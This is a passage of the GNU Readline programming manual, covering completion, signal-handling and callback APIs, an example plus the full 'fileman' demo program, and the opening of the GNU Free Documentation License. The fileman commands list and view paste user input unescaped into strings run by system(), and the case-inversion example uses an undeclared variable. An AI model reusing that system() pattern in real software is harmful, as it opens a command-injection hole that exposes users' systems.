Return 1 if c is a lowercase alphabetic character.
[Function]
int _rl_digit_p (int c)
Return 1 if c is a numeric character.
[Function]
int _rl_to_upper (int c)
If c is a lowercase alphabetic character, return the corresponding uppercase character.
[Function]
int _rl_to_lower (int c)
If c is an uppercase alphabetic character, return the corresponding lowercase charac-
ter.
[Function]
int _rl_digit_value (int c)
If c is a number, return the value it represents.
2.4.11 Miscellaneous Functions
[Function]
int rl_macro_bind (const char *keyseq, const char *macro, Keymap
map)
Bind the key sequence keyseq to invoke the macro macro. The binding is performed in
map. When keyseq is invoked, the macro will be inserted into the line. This function
is deprecated; use rl_generic_bind() instead.
[Function]
void rl_macro_dumper (int readable)
Print the key sequences bound to macros and their values, using the current keymap,
to rl_outstream. If readable is non-zero, the list is formatted in such a way that it
can be made part of an inputrc file and re-read.
[Function]
int rl_variable_bind (const char *variable, const char *value)
Make the Readline variable variable have value. This behaves as if the readline com-
mand ‘set variable value’ had been executed in an inputrc file (see Section 1.3.1
[Readline Init File Syntax], page 4).
[Function]
char * rl_variable_value (const char *variable)
Return a string representing the value of the Readline variable variable. For boolean
variables, this string is either ‘on’ or ‘off’.
Chapter 2: Programming with GNU Readline
37
[Function]
void rl_variable_dumper (int readable)
Print the readline variable names and their current values to rl_outstream. If read-
able is non-zero, the list is formatted in such a way that it can be made part of an
inputrc file and re-read.
[Function]
int rl_set_paren_blink_timeout (int u)
Set the time interval (in microseconds) that Readline waits when showing a balancing
character when blink-matching-paren has been enabled.
[Function]
char * rl_get_termcap (const char *cap)
Retrieve the string value of the termcap capability cap. Readline fetches the termcap
entry for the current terminal name and uses those capabilities to move around the
screen line and perform other terminal-specific operations, like erasing a line. Readline
does not use all of a terminal’s capabilities, and this function will return values for
only those capabilities Readline uses.
2.4.12 Alternate Interface
An alternate interface is available to plain readline(). Some applications need to interleave
keyboard I/O with file, device, or window system I/O, typically by using a main loop to
select() on various file descriptors. To accomodate this need, readline can also be invoked
as a ‘callback’ function from an event loop. There are functions available to make this easy.
[Function]
void rl_callback_handler_install (const char *prompt,
rl vcpfunc t *lhandler)
Set up the terminal for readline I/O and display the initial expanded value of prompt.
Save the value of lhandler to use as a function to call when a complete line of input
has been entered. The function takes the text of the line as an argument.
[Function]
void rl_callback_read_char (void)
Whenever an application determines that keyboard input is available, it should call
rl_callback_read_char(), which will read the next character from the current input
source.
If that character completes the line, rl_callback_read_char will invoke
the lhandler function saved by rl_callback_handler_install to process the line.
Before calling the lhandler function, the terminal settings are reset to the values they
had before calling rl_callback_handler_install. If the lhandler function returns,
the terminal settings are modified for Readline’s use again. EOF is indicated by calling
lhandler with a NULL line.
[Function]
void rl_callback_handler_remove (void)
Restore the terminal to its initial state and remove the line handler. This may be
called from within a callback as well as independently. If the lhandler installed by
rl_callback_handler_install does not exit the program, either this function or
the function referred to by the value of rl_deprep_term_function should be called
before the program exits to reset the terminal settings.
2.4.13 A Readline Example
Here is a function which changes lowercase characters to their uppercase equivalents, and
uppercase characters to lowercase. If this function was bound to ‘M-c’, then typing ‘M-c’
Chapter 2: Programming with GNU Readline
38
would change the case of the character under point. Typing ‘M-1 0 M-c’ would change the
case of the following 10 characters, leaving the cursor on the last character changed.
/* Invert the case of the COUNT following characters. */
int
invert_case_line (count, key)
int count, key;
{
register int start, end, i;
start = rl_point;
if (rl_point >= rl_end)
return (0);
if (count < 0)
{
direction = -1;
count = -count;
}
else
direction = 1;
/* Find the end of the range to modify. */
end = start + (count * direction);
/* Force it to be within range. */
if (end > rl_end)
end = rl_end;
else if (end < 0)
end = 0;
if (start == end)
return (0);
if (start > end)
{
int temp = start;
start = end;
end = temp;
}
/* Tell readline that we are modifying the line,
so it will save the undo information. */
rl_modifying (start, end);
for (i = start; i != end; i++)
Chapter 2: Programming with GNU Readline
39
{
if (_rl_uppercase_p (rl_line_buffer[i]))
rl_line_buffer[i] = _rl_to_lower (rl_line_buffer[i]);
else if (_rl_lowercase_p (rl_line_buffer[i]))
rl_line_buffer[i] = _rl_to_upper (rl_line_buffer[i]);
}
/* Move point to on top of the last character changed. */
rl_point = (direction == 1) ? end - 1 : start;
return (0);
}
2.5 Readline Signal Handling
Signals are asynchronous events sent to a process by the Unix kernel, sometimes on behalf
of another process. They are intended to indicate exceptional events, like a user pressing
the interrupt key on his terminal, or a network connection being broken. There is a class
of signals that can be sent to the process currently reading input from the keyboard. Since
Readline changes the terminal attributes when it is called, it needs to perform special
processing when such a signal is received in order to restore the terminal to a sane state, or
provide application writers with functions to do so manually.
Readline contains an internal signal handler that is installed for a number of signals
(SIGINT, SIGQUIT, SIGTERM, SIGALRM, SIGTSTP, SIGTTIN, and SIGTTOU).
When one of
these signals is received, the signal handler will reset the terminal attributes to those that
were in effect before readline() was called, reset the signal handling to what it was before
readline() was called, and resend the signal to the calling application.
If and when
the calling application’s signal handler returns, Readline will reinitialize the terminal and
continue to accept input. When a SIGINT is received, the Readline signal handler performs
some additional work, which will cause any partially-entered line to be aborted (see the
description of rl_free_line_state() below).
There is an additional Readline signal handler, for SIGWINCH, which the kernel sends to a
process whenever the terminal’s size changes (for example, if a user resizes an xterm). The
Readline SIGWINCH handler updates Readline’s internal screen size information, and then
calls any SIGWINCH signal handler the calling application has installed. Readline calls the
application’s SIGWINCH signal handler without resetting the terminal to its original state.
If the application’s signal handler does more than update its idea of the terminal size and
return (for example, a longjmp back to a main processing loop), it must call rl_cleanup_
after_signal() (described below), to restore the terminal state.
Readline provides two variables that allow application writers to control whether or not
it will catch certain signals and act on them when they are received. It is important that
applications change the values of these variables only when calling readline(), not in a
signal handler, so Readline’s internal signal state is not corrupted.
[Variable]
int rl_catch_signals
If this variable is non-zero, Readline will install signal handlers for SIGINT, SIGQUIT,
SIGTERM, SIGALRM, SIGTSTP, SIGTTIN, and SIGTTOU.
The default value of rl_catch_signals is 1.
Chapter 2: Programming with GNU Readline
40
[Variable]
int rl_catch_sigwinch
If this variable is non-zero, Readline will install a signal handler for SIGWINCH.
The default value of rl_catch_sigwinch is 1.
If an application does not wish to have Readline catch any signals, or to handle signals
other than those Readline catches (SIGHUP, for example), Readline provides convenience
functions to do the necessary terminal and internal state cleanup upon receipt of a signal.
[Function]
void rl_cleanup_after_signal (void)
This function will reset the state of the terminal to what it was before readline()
was called, and remove the Readline signal handlers for all signals, depending on the
values of rl_catch_signals and rl_catch_sigwinch.
[Function]
void rl_free_line_state (void)
This will free any partial state associated with the current input line (undo infor-
mation, any partial history entry, any partially-entered keyboard macro, and any
partially-entered numeric argument).
This should be called before rl_cleanup_
after_signal().
The Readline signal handler for SIGINT calls this to abort the
current input line.
[Function]
void rl_reset_after_signal (void)
This will reinitialize the terminal and reinstall any Readline signal handlers, depend-
ing on the values of rl_catch_signals and rl_catch_sigwinch.
If an application does not wish Readline to catch SIGWINCH, it may call rl_resize_
terminal() or rl_set_screen_size() to force Readline to update its idea of the terminal
size when a SIGWINCH is received.
[Function]
void rl_echo_signal_char (int sig)
If an application wishes to install its own signal handlers, but still have readline
display characters that generate signals, calling this function with sig set to SIGINT,
SIGQUIT, or SIGTSTP will display the character generating that signal.
[Function]
void rl_resize_terminal (void)
Update Readline’s internal screen size by reading values from the kernel.
[Function]
void rl_set_screen_size (int rows, int cols)
Set Readline’s idea of the terminal size to rows rows and cols columns. If either rows
or columns is less than or equal to 0, Readline’s idea of that terminal dimension is
unchanged.
If an application does not want to install a SIGWINCH handler, but is still interested in
the screen dimensions, Readline’s idea of the screen size may be queried.
[Function]
void rl_get_screen_size (int *rows, int *cols)
Return Readline’s idea of the terminal’s size in the variables pointed to by the argu-
ments.
[Function]
void rl_reset_screen_size (void)
Cause Readline to reobtain the screen size and recalculate its dimensions.
Chapter 2: Programming with GNU Readline
41
The following functions install and remove Readline’s signal handlers.
[Function]
int rl_set_signals (void)
Install Readline’s signal handler for SIGINT, SIGQUIT, SIGTERM, SIGALRM, SIGTSTP,
SIGTTIN, SIGTTOU, and SIGWINCH, depending on the values of rl_catch_signals and
rl_catch_sigwinch.
[Function]
int rl_clear_signals (void)
Remove all of the Readline signal handlers installed by rl_set_signals().
2.6 Custom Completers
Typically, a program that reads commands from the user has a way of disambiguating
commands and data. If your program is one of these, then it can provide completion for
commands, data, or both. The following sections describe how your program and Readline
cooperate to provide this service.
2.6.1 How Completing Works
In order to complete some text, the full list of possible completions must be available. That
is, it is not possible to accurately expand a partial word without knowing all of the possible
words which make sense in that context. The Readline library provides the user interface
to completion, and two of the most common completion functions: filename and username.
For completing other types of text, you must write your own completion function. This
section describes exactly what such functions must do, and provides an example.
There are three major functions used to perform completion:
1. The user-interface function rl_complete().
This function is called with the same
arguments as other bindable Readline functions: count and invoking key. It isolates
the word to be completed and calls rl_completion_matches() to generate a list of
possible completions. It then either lists the possible completions, inserts the possible
completions, or actually performs the completion, depending on which behavior is
desired.
2. The internal function rl_completion_matches() uses an application-supplied gener-
ator function to generate the list of possible matches, and then returns the array of
these matches. The caller should place the address of its generator function in rl_
completion_entry_function.
3. The generator function is called repeatedly from rl_completion_matches(), returning
a string each time. The arguments to the generator function are text and state. text
is the partial word to be completed. state is zero the first time the function is called,
allowing the generator to perform any necessary initialization, and a positive non-
zero integer for each subsequent call. The generator function returns (char *)NULL to
inform rl_completion_matches() that there are no more possibilities left. Usually
the generator function computes the list of possible completions when state is zero,
and returns them one at a time on subsequent calls. Each string the generator function
returns as a match must be allocated with malloc(); Readline frees the strings when
it has finished with them. Such a generator function is referred to as an application-
specific completion function.
Chapter 2: Programming with GNU Readline
42
[Function]
int rl_complete (int ignore, int invoking key)
Complete the word at or before point. You have supplied the function that does the
initial simple matching selection algorithm (see rl_completion_matches()). The
default is to do filename completion.
[Variable]
rl_compentry_func_t * rl_completion_entry_function
This is a pointer to the generator function for rl_completion_matches(). If the
value of rl_completion_entry_function is NULL then the default filename generator
function, rl_filename_completion_function(), is used.
An application-specific
completion function is a function whose address is assigned to rl_completion_entry_
function and whose return values are used to generate possible completions.
2.6.2 Completion Functions
Here is the complete list of callable completion functions present in Readline.
[Function]
int rl_complete_internal (int what to do)
Complete the word at or before point. what to do says what to do with the com-
pletion. A value of ‘?’ means list the possible completions. ‘TAB’ means do standard
completion. ‘*’ means insert all of the possible completions. ‘!’ means to display all
of the possible completions, if there is more than one, as well as performing partial
completion. ‘@’ is similar to ‘!’, but possible completions are not listed if the possible
completions share a common prefix.
[Function]
int rl_complete (int ignore, int invoking key)
Complete the word at or before point. You have supplied the function that does
the initial simple matching selection algorithm (see rl_completion_matches() and
rl_completion_entry_function). The default is to do filename completion. This
calls rl_complete_internal() with an argument depending on invoking key.
[Function]
int rl_possible_completions (int count, int invoking key)
List the possible completions. See description of rl_complete (). This calls rl_
complete_internal() with an argument of ‘?’.
[Function]
int rl_insert_completions (int count, int invoking key)
Insert the list of possible completions into the line, deleting the partially-completed
word. See description of rl_complete(). This calls rl_complete_internal() with
an argument of ‘*’.
[Function]
int rl_completion_mode (rl command func t *cfunc)
Returns the apppriate value to pass to rl_complete_internal() depending on
whether cfunc was called twice in succession and the values of the show-all-if-
ambiguous and show-all-if-unmodified variables. Application-specific completion
functions may use this function to present the same interface as rl_complete().
[Function]
char ** rl_completion_matches (const char *text,
rl compentry func t *entry func)
Returns an array of strings which is a list of completions for text. If there are no
completions, returns NULL. The first entry in the returned array is the substitution
Chapter 2: Programming with GNU Readline
43
for text. The remaining entries are the possible completions. The array is terminated
with a NULL pointer.
entry func is a function of two args, and returns a char *. The first argument is
text. The second is a state argument; it is zero on the first call, and non-zero on
subsequent calls. entry func returns a NULL pointer to the caller when there are no
more matches.
[Function]
char * rl_filename_completion_function (const char *text, int
state)
A generator function for filename completion in the general case. text is a partial file-
name. The Bash source is a useful reference for writing application-specific completion
functions (the Bash completion functions call this and other Readline functions).
[Function]
char * rl_username_completion_function (const char *text, int
state)
A completion generator for usernames. text contains a partial username preceded by
a random character (usually ‘~’). As with all completion generators, state is zero on
the first call and non-zero for subsequent calls.
2.6.3 Completion Variables
[Variable]
rl_compentry_func_t * rl_completion_entry_function
A pointer to the generator function for rl_completion_matches(). NULL means to
use rl_filename_completion_function(), the default filename completer.
[Variable]
rl_completion_func_t * rl_attempted_completion_function
A pointer to an alternative function to create matches. The function is called with
text, start, and end.
start and end are indices in rl_line_buffer defining the
boundaries of text, which is a character string. If this function exists and returns
NULL, or if this variable is set to NULL, then rl_complete() will call the value of
rl_completion_entry_function to generate matches, otherwise the array of strings
returned will be used.
If this function sets the rl_attempted_completion_over
variable to a non-zero value, Readline will not perform its default completion even if
this function returns no matches.
[Variable]
rl_quote_func_t * rl_filename_quoting_function
A pointer to a function that will quote a filename in an application-specific fashion.
This is called if filename completion is being attempted and one of the characters
in rl_filename_quote_characters appears in a completed filename. The function
is called with text, match type, and quote pointer. The text is the filename to be
quoted.
The match type is either SINGLE_MATCH, if there is only one completion
match, or MULT_MATCH. Some functions use this to decide whether or not to insert a
closing quote character. The quote pointer is a pointer to any opening quote character
the user typed. Some functions choose to reset this character.
[Variable]
rl_dequote_func_t * rl_filename_dequoting_function
A pointer to a function that will remove application-specific quoting characters from
a filename before completion is attempted, so those characters do not interfere with
matching the text against names in the filesystem. It is called with text, the text
Chapter 2: Programming with GNU Readline
44
of the word to be dequoted, and quote char, which is the quoting character that
delimits the filename (usually ‘’’ or ‘"’). If quote char is zero, the filename was not
in an embedded string.
[Variable]
rl_linebuf_func_t * rl_char_is_quoted_p
A pointer to a function to call that determines whether or not a specific character
in the line buffer is quoted, according to whatever quoting mechanism the program
calling Readline uses. The function is called with two arguments: text, the text of the
line, and index, the index of the character in the line. It is used to decide whether a
character found in rl_completer_word_break_characters should be used to break
words for the completer.
[Variable]
rl_compignore_func_t * rl_ignore_some_completions_function
This function, if defined, is called by the completer when real filename completion
is done, after all the matching names have been generated. It is passed a NULL ter-
minated array of matches. The first element (matches[0]) is the maximal substring
common to all matches. This function can re-arrange the list of matches as required,
but each element deleted from the array must be freed.
[Variable]
rl_icppfunc_t * rl_directory_completion_hook
This function, if defined, is allowed to modify the directory portion of filenames
Readline completes. It is called with the address of a string (the current directory
name) as an argument, and may modify that string. If the string is replaced with
a new string, the old value should be freed. Any modified directory name should
have a trailing slash. The modified value will be displayed as part of the completion,
replacing the directory portion of the pathname the user typed. It returns an integer
that should be non-zero if the function modifies its directory argument. It could be
used to expand symbolic links or shell variables in pathnames. At the least, even if
no other expansion is performed, this function should remove any quote characters
from the directory name, because its result will be passed directly to opendir().
[Variable]
rl_dequote_func_t * rl_filename_rewrite_hook
If non-zero, this is the address of a function called when reading directory entries from
the filesystem for completion and comparing them to the partial word to be completed.
The function should perform any necesary application or system-specific conversion on
the filename, such as converting between character sets or converting from a filesystem
format to a character input format. The function takes two arguments: fname, the
filename to be converted, and fnlen, its length in bytes. It must either return its first
argument (if no conversion takes place) or the converted filename in newly-allocated
memory. The converted form is used to compare against the word to be completed,
and, if it matches, is added to the list of matches. Readline will free the allocated
string.
[Variable]
rl_compdisp_func_t * rl_completion_display_matches_hook
If non-zero, then this is the address of a function to call when completing a word would
normally display the list of possible matches. This function is called in lieu of Readline
displaying the list. It takes three arguments: (char **matches, int num matches,
int max length) where matches is the array of matching strings, num matches is the
number of strings in that array, and max length is the length of the longest string in
Chapter 2: Programming with GNU Readline
45
that array. Readline provides a convenience function, rl_display_match_list, that
takes care of doing the display to Readline’s output stream. That function may be
called from this hook.
[Variable]
const char * rl_basic_word_break_characters
The basic list of characters that signal a break between words for the completer
routine. The default value of this variable is the characters which break words for
completion in Bash: " \t\n\"\\’‘@$><=;|&{(".
[Variable]
const char * rl_basic_quote_characters
A list of quote characters which can cause a word break.
[Variable]
const char * rl_completer_word_break_characters
The list of characters that signal a break between words for rl_complete_
internal(). The default list is the value of rl_basic_word_break_characters.
[Variable]
rl_cpvfunc_t * rl_completion_word_break_hook
If non-zero, this is the address of a function to call when Readline is deciding where
to separate words for word completion. It should return a character string like rl_
completer_word_break_characters to be used to perform the current completion.
The function may choose to set rl_completer_word_break_characters itself. If the
function returns NULL, rl_completer_word_break_characters is used.
[Variable]
const char * rl_completer_quote_characters
A list of characters which can be used to quote a substring of the line. Completion
occurs on the entire substring, and within the substring rl_completer_word_break_
characters are treated as any other character, unless they also appear within this
list.
[Variable]
const char * rl_filename_quote_characters
A list of characters that cause a filename to be quoted by the completer when they
appear in a completed filename. The default is the null string.
[Variable]
const char * rl_special_prefixes
The list of characters that are word break characters, but should be left in text when
it is passed to the completion function. Programs can use this to help determine what
kind of completing to do. For instance, Bash sets this variable to "$@" so that it can
complete shell variables and hostnames.
[Variable]
int rl_completion_query_items
Up to this many items will be displayed in response to a possible-completions call.
After that, readline asks the user if she is sure she wants to see them all. The default
value is 100. A negative value indicates that Readline should never ask the user.
[Variable]
int rl_completion_append_character
When a single completion alternative matches at the end of the command line, this
character is appended to the inserted completion text. The default is a space character
(‘ ’).
Setting this to the null character (‘\0’) prevents anything being appended
automatically. This can be changed in application-specific completion functions to
provide the “most sensible word separator character” according to an application-
specific command line syntax specification.
Chapter 2: Programming with GNU Readline
46
[Variable]
int rl_completion_suppress_append
If non-zero, rl completion append character is not appended to matches at the end
of the command line, as described above. It is set to 0 before any application-specific
completion function is called, and may only be changed within such a function.
[Variable]
int rl_completion_quote_character
When Readline is completing quoted text, as delimited by one of the characters in
rl completer quote characters, it sets this variable to the quoting character found.
This is set before any application-specific completion function is called.
[Variable]
int rl_completion_suppress_quote
If non-zero, Readline does not append a matching quote character when performing
completion on a quoted string. It is set to 0 before any application-specific completion
function is called, and may only be changed within such a function.
[Variable]
int rl_completion_found_quote
When Readline is completing quoted text, it sets this variable to a non-zero value if
the word being completed contains or is delimited by any quoting characters, including
backslashes. This is set before any application-specific completion function is called.
[Variable]
int rl_completion_mark_symlink_dirs
If non-zero, a slash will be appended to completed filenames that are symbolic links
to directory names, subject to the value of the user-settable mark-directories variable.
This variable exists so that application-specific completion functions can override the
user’s global preference (set via the mark-symlinked-directories Readline variable)
if appropriate. This variable is set to the user’s preference before any application-
specific completion function is called, so unless that function modifies the value, the
user’s preferences are honored.
[Variable]
int rl_ignore_completion_duplicates
If non-zero, then duplicates in the matches are removed. The default is 1.
[Variable]
int rl_filename_completion_desired
Non-zero means that the results of the matches are to be treated as filenames. This
is always zero when completion is attempted, and can only be changed within an
application-specific completion function. If it is set to a non-zero value by such a
function, directory names have a slash appended and Readline attempts to quote com-
pleted filenames if they contain any characters in rl_filename_quote_characters
and rl_filename_quoting_desired is set to a non-zero value.
[Variable]
int rl_filename_quoting_desired
Non-zero means that the results of the matches are to be quoted using double quotes
(or an application-specific quoting mechanism) if the completed filename contains
any characters in rl_filename_quote_chars. This is always non-zero when comple-
tion is attempted, and can only be changed within an application-specific completion
function. The quoting is effected via a call to the function pointed to by rl_filename_
quoting_function.
Chapter 2: Programming with GNU Readline
47
[Variable]
int rl_attempted_completion_over
If
an
application-specific
completion
function
assigned
to
rl_attempted_
completion_function sets this variable to a non-zero value, Readline will not
perform its default filename completion even if the application’s completion function
returns no matches. It should be set only by an application’s completion function.
[Variable]
int rl_sort_completion_matches
If an application sets this variable to 0, Readline will not sort the list of completions
(which implies that it cannot remove any duplicate completions). The default value is
1, which means that Readline will sort the completions and, depending on the value
of rl_ignore_completion_duplicates, will attempt to remove duplicate matches.
[Variable]
int rl_completion_type
Set to a character describing the type of completion Readline is currently attempt-
ing; see the description of rl_complete_internal() (see Section 2.6.2 [Completion
Functions], page 42) for the list of characters. This is set to the appropriate value
before any application-specific completion function is called, allowing such functions
to present the same interface as rl_complete().
[Variable]
int rl_completion_invoking_key
Set to the final character in the key sequence that invoked one of the completion
functions that call rl_complete_internal(). This is set to the appropriate value
before any application-specific completion function is called.
[Variable]
int rl_inhibit_completion
If this variable is non-zero, completion is inhibited. The completion character will be
inserted as any other bound to self-insert.
2.6.4 A Short Completion Example
Here is a small application demonstrating the use of the GNU Readline library. It is called
fileman, and the source code resides in ‘examples/fileman.c’. This sample application
provides completion of command names, line editing features, and access to the history list.
Chapter 2: Programming with GNU Readline
48
/* fileman.c -- A tiny application which demonstrates how to use the
GNU Readline library.
This application interactively allows users
to manipulate files and their modes. */
#ifdef HAVE_CONFIG_H
#
include <config.h>
#endif
#include <sys/types.h>
#ifdef HAVE_SYS_FILE_H
#
include <sys/file.h>
#endif
#include <sys/stat.h>
#ifdef HAVE_UNISTD_H
#
include <unistd.h>
#endif
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#if defined (HAVE_STRING_H)
#
include <string.h>
#else /* !HAVE_STRING_H */
#
include <strings.h>
#endif /* !HAVE_STRING_H */
#ifdef HAVE_STDLIB_H
#
include <stdlib.h>
#endif
#include <time.h>
#include <readline/readline.h>
#include <readline/history.h>
extern char *xmalloc PARAMS((size_t));
/* The names of functions that actually do the manipulation. */
int com_list PARAMS((char *));
int com_view PARAMS((char *));
int com_rename PARAMS((char *));
int com_stat PARAMS((char *));
int com_pwd PARAMS((char *));
int com_delete PARAMS((char *));
int com_help PARAMS((char *));
int com_cd PARAMS((char *));
int com_quit PARAMS((char *));
/* A structure which contains information on the commands this program
can understand. */
typedef struct {
char *name; /* User printable name of the function. */
rl_icpfunc_t *func; /* Function to call to do the job. */
char *doc; /* Documentation for this function.
*/
} COMMAND;
Chapter 2: Programming with GNU Readline
49
COMMAND commands[] = {
{ "cd", com_cd, "Change to directory DIR" },
{ "delete", com_delete, "Delete FILE" },
{ "help", com_help, "Display this text" },
{ "?", com_help, "Synonym for ‘help’" },
{ "list", com_list, "List files in DIR" },
{ "ls", com_list, "Synonym for ‘list’" },
{ "pwd", com_pwd, "Print the current working directory" },
{ "quit", com_quit, "Quit using Fileman" },
{ "rename", com_rename, "Rename FILE to NEWNAME" },
{ "stat", com_stat, "Print out statistics on FILE" },
{ "view", com_view, "View the contents of FILE" },
{ (char *)NULL, (rl_icpfunc_t *)NULL, (char *)NULL }
};
/* Forward declarations. */
char *stripwhite ();
COMMAND *find_command ();
/* The name of this program, as taken from argv[0]. */
char *progname;
/* When non-zero, this global means the user is done using this program. */
int done;
char *
dupstr (s)
char *s;
{
char *r;
r = xmalloc (strlen (s) + 1);
strcpy (r, s);
return (r);
}
main (argc, argv)
int argc;
char **argv;
{
char *line, *s;
progname = argv[0];
initialize_readline (); /* Bind our completer. */
/* Loop reading and executing lines until the user quits. */
for ( ; done == 0; )
{
line = readline ("FileMan: ");
if (!line)
break;
/* Remove leading and trailing whitespace from the line.
Then, if there is anything left, add it to the history list
and execute it. */
Chapter 2: Programming with GNU Readline
50
s = stripwhite (line);
if (*s)
{
add_history (s);
execute_line (s);
}
free (line);
}
exit (0);
}
/* Execute a command line. */
int
execute_line (line)
char *line;
{
register int i;
COMMAND *command;
char *word;
/* Isolate the command word. */
i = 0;
while (line[i] && whitespace (line[i]))
i++;
word = line + i;
while (line[i] && !whitespace (line[i]))
i++;
if (line[i])
line[i++] = ’\0’;
command = find_command (word);
if (!command)
{
fprintf (stderr, "%s: No such command for FileMan.\n", word);
return (-1);
}
/* Get argument to command, if any. */
while (whitespace (line[i]))
i++;
word = line + i;
/* Call the function. */
return ((*(command->func)) (word));
}
/* Look up NAME as the name of a command, and return a pointer to that
command.
Return a NULL pointer if NAME isn’t a command name. */
COMMAND *
find_command (name)
char *name;
{
Chapter 2: Programming with GNU Readline
51
register int i;
for (i = 0; commands[i].name; i++)
if (strcmp (name, commands[i].name) == 0)
return (&commands[i]);
return ((COMMAND *)NULL);
}
/* Strip whitespace from the start and end of STRING.
Return a pointer
into STRING. */
char *
stripwhite (string)
char *string;
{
register char *s, *t;
for (s = string; whitespace (*s); s++)
;
if (*s == 0)
return (s);
t = s + strlen (s) - 1;
while (t > s && whitespace (*t))
t--;
*++t = ’\0’;
return s;
}
/* **************************************************************** */
/*
*/
/*
Interface to Readline Completion
*/
/*
*/
/* **************************************************************** */
char *command_generator PARAMS((const char *, int));
char **fileman_completion PARAMS((const char *, int, int));
/* Tell the GNU Readline library how to complete.
We want to try to complete
on command names if this is the first word in the line, or on filenames
if not. */
initialize_readline ()
{
/* Allow conditional parsing of the ~/.inputrc file. */
rl_readline_name = "FileMan";
/* Tell the completer that we want a crack first. */
rl_attempted_completion_function = fileman_completion;
}
/* Attempt to complete on the contents of TEXT.
START and END bound the
region of rl_line_buffer that contains the word to complete.
TEXT is
the word to complete.
We can use the entire contents of rl_line_buffer
in case we want to do some simple parsing.
Return the array of matches,
or NULL if there aren’t any. */
char **
Chapter 2: Programming with GNU Readline
52
fileman_completion (text, start, end)
const char *text;
int start, end;
{
char **matches;
matches = (char **)NULL;
/* If this word is at the start of the line, then it is a command
to complete.
Otherwise it is the name of a file in the current
directory. */
if (start == 0)
matches = rl_completion_matches (text, command_generator);
return (matches);
}
/* Generator function for command completion.
STATE lets us know whether
to start from scratch; without any state (i.e. STATE == 0), then we
start at the top of the list. */
char *
command_generator (text, state)
const char *text;
int state;
{
static int list_index, len;
char *name;
/* If this is a new word to complete, initialize now.
This includes
saving the length of TEXT for efficiency, and initializing the index
variable to 0. */
if (!state)
{
list_index = 0;
len = strlen (text);
}
/* Return the next name which partially matches from the command list. */
while (name = commands[list_index].name)
{
list_index++;
if (strncmp (name, text, len) == 0)
return (dupstr(name));
}
/* If no names matched, then return NULL. */
return ((char *)NULL);
}
/* **************************************************************** */
/*
*/
/*
FileMan Commands
*/
/*
*/
/* **************************************************************** */
/* String to pass to system ().
This is for the LIST, VIEW and RENAME
commands. */
Chapter 2: Programming with GNU Readline
53
static char syscom[1024];
/* List the file(s) named in arg. */
com_list (arg)
char *arg;
{
if (!arg)
arg = "";
sprintf (syscom, "ls -FClg %s", arg);
return (system (syscom));
}
com_view (arg)
char *arg;
{
if (!valid_argument ("view", arg))
return 1;
#if defined (__MSDOS__)
/* more.com doesn’t grok slashes in pathnames */
sprintf (syscom, "less %s", arg);
#else
sprintf (syscom, "more %s", arg);
#endif
return (system (syscom));
}
com_rename (arg)
char *arg;
{
too_dangerous ("rename");
return (1);
}
com_stat (arg)
char *arg;
{
struct stat finfo;
if (!valid_argument ("stat", arg))
return (1);
if (stat (arg, &finfo) == -1)
{
perror (arg);
return (1);
}
printf ("Statistics for ‘%s’:\n", arg);
printf ("%s has %d link%s, and is %d byte%s in length.\n",
arg,
finfo.st_nlink,
(finfo.st_nlink == 1) ? "" : "s",
finfo.st_size,
(finfo.st_size == 1) ? "" : "s");
printf ("Inode Last Change at: %s", ctime (&finfo.st_ctime));
Chapter 2: Programming with GNU Readline
54
printf ("
Last access at: %s", ctime (&finfo.st_atime));
printf ("
Last modified at: %s", ctime (&finfo.st_mtime));
return (0);
}
com_delete (arg)
char *arg;
{
too_dangerous ("delete");
return (1);
}
/* Print out help for ARG, or for all of the commands if ARG is
not present. */
com_help (arg)
char *arg;
{
register int i;
int printed = 0;
for (i = 0; commands[i].name; i++)
{
if (!*arg || (strcmp (arg, commands[i].name) == 0))
{
printf ("%s\t\t%s.\n", commands[i].name, commands[i].doc);
printed++;
}
}
if (!printed)
{
printf ("No commands match ‘%s’.
Possibilties are:\n", arg);
for (i = 0; commands[i].name; i++)
{
/* Print in six columns. */
if (printed == 6)
{
printed = 0;
printf ("\n");
}
printf ("%s\t", commands[i].name);
printed++;
}
if (printed)
printf ("\n");
}
return (0);
}
/* Change to the directory ARG. */
com_cd (arg)
char *arg;
{
if (chdir (arg) == -1)
{
Chapter 2: Programming with GNU Readline
55
perror (arg);
return 1;
}
com_pwd ("");
return (0);
}
/* Print out the current working directory. */
com_pwd (ignore)
char *ignore;
{
char dir[1024], *s;
s = getcwd (dir, sizeof(dir) - 1);
if (s == 0)
{
printf ("Error getting pwd: %s\n", dir);
return 1;
}
printf ("Current directory is %s\n", dir);
return 0;
}
/* The user wishes to quit using this program.
Just set DONE non-zero. */
com_quit (arg)
char *arg;
{
done = 1;
return (0);
}
/* Function which tells you that you can’t do this. */
too_dangerous (caller)
char *caller;
{
fprintf (stderr,
"%s: Too dangerous for me to distribute.
Write it yourself.\n",
caller);
}
/* Return non-zero if ARG is a valid argument for CALLER, else print
an error message and return zero. */
int
valid_argument (caller, arg)
char *caller, *arg;
{
if (!arg || !*arg)
{
fprintf (stderr, "%s: Argument required.\n", caller);
return (0);
}
return (1);
}
Appendix A: GNU Free Documentation License
56
Appendix A GNU Free Documentation License
Version 1.3, 3 November 2008
Copyright c⃝ 2000, 2001, 2002, 2007, 2008 Free Software Foundation, Inc.
http://fsf.org/
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
0. PREAMBLE
The purpose of this License is to make a manual, textbook, or other functional and
useful document free in the sense of freedom: to assure everyone the effective freedom
to copy and redistribute it, with or without modifying it, either commercially or non-
commercially. Secondarily, this License preserves for the author and publisher a way
to get credit for their work, while not being considered responsible for modifications
made by others.
This License is a kind of “copyleft”, which means that derivative works of the document
must themselves be free in the same sense. It complements the GNU General Public
License, which is a copyleft license designed for free software.
We have designed this License in order to use it for manuals for free software, because
free software needs free documentation: a free program should come with manuals
providing the same freedoms that the software does. But this License is not limited to
software manuals; it can be used for any textual work, regardless of subject matter or
whether it is published as a printed book. We recommend this License principally for
works whose purpose is instruction or reference.
1. APPLICABILITY AND DEFINITIONS
This License applies to any manual or other work, in any medium, that contains a
notice placed by the copyright holder saying it can be distributed under the terms
of this License. Such a notice grants a world-wide, royalty-free license, unlimited in
duration, to use that work under the conditions stated herein.
The “Document”,
below, refers to any such manual or work. Any member of the public is a licensee, and
is addressed as “you”. You accept the license if you copy, modify or distribute the work
in a way requiring permission under copyright law.
A “Modified Version” of the Document means any work containing the Document or
a portion of it, either copied verbatim, or with modifications and/or translated into
another language.
A “Secondary Section” is a named appendix or a front-matter section of the Document
that deals exclusively with the relationship of the publishers or authors of the Document
